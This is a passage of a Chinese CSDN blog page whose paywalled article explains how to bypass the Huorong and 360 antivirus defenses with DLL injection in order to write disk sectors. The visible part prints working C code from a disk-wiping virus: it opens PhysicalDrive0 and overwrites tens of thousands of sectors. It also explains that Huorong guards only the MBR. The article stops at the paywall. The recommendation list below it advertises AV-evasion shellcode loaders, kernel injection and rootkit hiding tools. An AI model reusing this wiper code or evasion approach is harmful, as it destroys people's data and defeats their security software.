如何利用DLL注入绕过火绒和360主动防御写入扇区?

最新推荐文章于 2023-09-11 08:00:00 发布
VIP文章 最新推荐文章于 2023-09-11 08:00:00 发布
阅读量4k 收藏 3
点赞数 1
分类专栏: 系统安全 文章标签: 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65355471/article/details/121956134
版权

前言

由于我自己是一个系统安全爱好者,之前下载了一个能覆写所有扇区的病毒源码,我以为火绒可以保护我的扇区,我就傻乎乎的调试运行了,然后火绒把mbr写入拦截了,我以为没有任何问题了,已重启,哦,Missing Operating System。

在痛失电脑之后,我一直在想病毒是如何做到火绒报警了但是还是写入了扇区?后来我简单分析了源码之后,我看到了这样的一段代码

int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpszArgument,int nCmdShow) {
	HANDLE drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
	DWORD wb;
	unsigned char *bootcode = (unsigned char *)LocalAlloc(LMEM_ZEROINIT, 512);
	SetFilePointer(drive, 0, NULL, FILE_BEGIN);
	for(int i = 0;i < 50000;i++){
		WriteFile(drive, bootcode, 512, &wb, NULL);
		SetFilePointer(drive, 512, NULL, FILE_CURRENT);
	}
	CloseHandle(drive);

这个病毒从0扇区开始写,写入了前5000扇区,而火绒只会拦截0扇区(也就是MBR)的写入!所以病毒运行之后火绒虽然拦截了MBR写入࿰

最低0.47元/天 解锁文章
m0_65355471
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
驱动级进程保护 隐藏 注入
08-04
驱动级进程保护 隐藏 注入 W7 W8 W10 32 64位都支持 不蓝屏
2020美亚团队赛复盘
热门推荐
wuwuliuliu0524的博客
08-01 1万+
团队赛veracrypt密码FvIDu!WZvamS!案件背景你的电子数据取证调查结果发现一个国际黑客组织牵涉这宗案件。经深入调查后,调查队伍相信该黑客组织入侵了一个名为Zello的本地网上商店官网,黑客组织也针对另一家网上商店Xeno发动网络攻击,使其系统产生故障。调查期间发现三名男子张伟华、冯启礼及罗俊杰疑与该案有关。警方在搜查他们的住宅及公司后扣押了数十台电子设备。请分析电子数据证据并重建入侵痕迹。1.编号详情档案路径1Zello服务器的镜像文件编号详情档案路径1编号。................
一个菜鸡的免杀之路(一)
Karka_的博客
09-11 285
作为一个web狗,对免杀这块是一直没办法深入学习,在恶补了些二进制基础后,开启了我的免杀之路(doge)
【工具分享】免杀360&火绒的shellcode加载器
crowsec
01-20 1743
该shellcode加载器目前可以过360&火绒,Windows Defender没戏。。。
X86软件逆向分析实战(一)
10-21
对于那些“不听话”的软件,怎么办?你是想忍声吞气凑合着用?还是想“修理”一顿,让它乖乖地按照你的意思办?本课程教你“驯服”那些你看中的软件! 掌握这个技能,无论它是什么软件,只能乖乖按你的意思办! 课程内容会涉及到与X86软件逆向分析相关的各种杂项与细节实现,其中涵盖OD、CE、IDA、WinAPI、Visual Studio 2019、易语言、C/C++、C#、汇编等使用技巧与编程技巧。若你是编程初学者,认真学习本课程后,你的能力将会有极大的提升。若你是编程大佬,建议勿跳过每一节课,一定会有所收获!
火绒内核注入dll方式win7-win10通用x64下不触发PG
chio1994的博客
07-09 2353
帖子原地址为:http://www.mengwuji.net/thread-6765-1-1.html 看起来相当简单.结果踩进去以后全都是坑 32位下完工代码地址:http://git.oschina.net/ockdieso/nahequdongzhurudll 只是对哪个帖子做一些...
网络靶场实战-免杀技术之dll注入技术详解
蛇矛实验室
12-19 1106
对于 Windows 操作系统,操作系统的大部分功能都是由 DLL 提供的。此外,当您在这些 Windows 操作系统上运行程序时,该程序的大部分功能可能由 DLL 提供。例如,一些程序可能包含许多不同的模块,程序的每个模块都包含在DLL中并分布在DLL中。DLL 的使用有助于促进代码的模块化、代码重用、有效的内存使用和减少磁盘空间。因此,操作系统和程序加载速度更快,运行速度更快,并且在计算机上占用的磁盘空间更少。当程序使用 DLL 时,称为依赖性的问题可能会导致程序无法运行。
windows10驱动 x64--- 驱动实现隐藏驱动模块(五)
weixin_41725706的博客
11-11 616
隐藏任意内核驱动
[Rootkit] dll 隐藏 - VAD
墨鱼菜鸡
06-10 380
3环下要想隐藏dll,仅仅靠断链和抹去PE头信息是不够的;这样做能骗过同样在3环运行的调试器,但是骗不过在0环通过驱动做检测的PChunter、Process Hacker等工具;要想彻底隐藏,需要更进一步搞定驱动层的各种...
MagicWall-master ( 火绒注入demo ).zip_DEMO_magic wall_内核注入_火绒注入_驱动注入
07-14
火绒注入手法便是如此了,别人的源码,转来的
DLL驱动级注入源码
10-16
DLL驱动级注入C++源码,都懂的,驱动级拥有系统最高权限,可以注入任意游戏。
驱动DLL注入源码
12-23
驱动DLL注入源码 没有什么好说的 ,超级强的源码
LdrLoadDll驱动dll注入源码
01-20
通过LdrLoadDl的驱动级dll注入源码 在xp系统可以注入dll到保护的进程
离线注入驱动
07-03
PE下使用换主板无法系统删除驱动用
完美的内存中加载DLL支持32位和64位DLL
02-20
一位高手写的内存中加载DLL的源代码,支持32位和64位的DLL,支持XE,完美的处理32/64位Windows动态库的加载模,网上很少能下载到了,放到这里备份一下
【动态链接库】自己编写的AttachKiller.dll注入wininit.exe可以绕过360扇区
12-15
一个动态链接库,使用各种dll注入注入wininit.exe可以在360火绒安全软件运行的情况下写入扇区(需要管理员权限)
记一次绕过火绒安全提权实战案例1
08-03
记一次绕过火绒安全提权实战案例1
火绒注入(内核hook稳定注入)
09-09
火绒注入(内核hook稳定注入)
服务器版火绒安全 服务器专用杀毒软件 火绒服务器版
01-22
服务器版火绒安全 服务器专用安全防护系统 火绒服务器版 服务器版火绒安全 服务器专用安全防护系统 火绒服务器版
火绒可以修复dll
最新发布
12-08
火绒是一款安全软件,主要用于防护计算机系统免受恶意软件或病毒的侵害。它具备实时监控、漏洞修复和恶意软件拦截等功能,可以帮助用户保护计算机的安全。然而,火绒本身并不具备修复dll文件的功能。 DLL(Dynamic ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值